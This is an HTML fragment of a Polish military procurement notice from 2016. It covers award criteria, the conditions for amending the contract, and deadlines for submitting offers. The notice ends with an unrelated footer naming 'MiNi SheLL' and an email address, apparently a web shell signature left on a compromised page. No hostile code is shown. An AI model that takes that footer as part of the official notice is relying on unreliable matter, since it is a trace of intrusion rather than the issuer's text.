<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Termin wykonania zamówienia - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych z późn. zm. przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty 
w zakresie: 
zmiany terminu wykonania przedmiotu umowy, o którym mowa w § 3 ust.1 projektu umowy, z zastrzeżeniem ust. 2 3 w następującym zakresie: 
jeżeli umowa nie może być wykonana w terminie z przyczyn leżących po stronie Zamawiającego, 
jeżeli umowa nie może być wykonana w terminie z przyczyn niezawinionych przez Wykonawcę, 
działania siły wyższej, z zastrzeżeniem ust. 4, 
zmiany przedstawiciela Wykonawcy na budowie na wniosek Wykonawcy, pod warunkiem,     że osoba wskazana do przejęcia obowiązków, będzie posiadała przygotowanie co najmniej równe osobie dotychczas pełniącej tę funkcję oraz będzie spełniała wymogi określone w specyfikacji istotnych warunków zamówienia, 
zmiany w zakresie wskazanych dla realizacji umowy podwykonawców  w przypadku gdy      w szczególności podwykonawca wadliwie wykonuje umowę, w tym zaprzestał jej wykonywania lub w razie upadłości/likwidacji Podwykonawcy  w tym podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału 
w postępowaniu pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków 
w zakresie nie mniejszym niż wymagane w SIWZ
istotnych zmian w przepisach ustawowych i aktach wykonawczych związanych 
z przedmiotem zamówienia, które nastąpiły po dniu podpisania umowy. 
ograniczenia przedmiotu zamówienia, w szczególności w przypadku kiedy Zamawiający nie mógł takiej sytuacji przewidzieć.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 1 lit.a) termin realizacji przedmiotu zamówienia może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia jego wykonywania w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. Strony umowy z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót w miejscu budowy. 
Strony Umowy ustalają nowe terminy realizacji zamówienia, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy będzie równy okresowi przerwy lub przestoju. Dodatkowo przyczyna i okres przesunięcia terminu będzie musiał być szczegółowo uzasadniony przez Wykonawcę i zaakceptowany przez inspektora nadzoru             i Zamawiającego. 
Za siłę wyższą, o której mowa w niniejszej umowie, strony uznają zdarzenia nadzwyczajne, zewnętrzne o charakterze nadzwyczajnym, niezależne od woli Stron po zawarciu niniejszej umowy, które nie udało się zapobiec przy zachowaniu należytej staranności, skutkujące niemożliwością prowadzenia robót, a w szczególności epidemią stwierdzoną przez uprawnione do tego organy lokalne lub państwowe, klęską żywiołową, strajkiem lub stanem wyjątkowym.
W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy                  z przyczyn, o których mowa wyżej, Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany. 
Z okoliczności stanowiących podstawę zmiany do umowy Wykonawca sporządzi protokół, który zostanie podpisany przez Strony umowy. 
Zmiana umowy powinna nastąpić w formie pisemnego aneksu sporządzonego przez Zamawiającego i podpisanego przez Strony umowy, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne. 
Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.23blt.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 23. Baza Lotnictwa Taktycznego, 05-300 Mińsk Mazowiecki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2016 godzina 11:00, miejsce: 23. Baza Lotnictwa Taktycznego, 05-300 Mińsk Mazowiecki kancelaria jawna od poniedziałku do piątku w  godzinach 7:30 - 15:30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com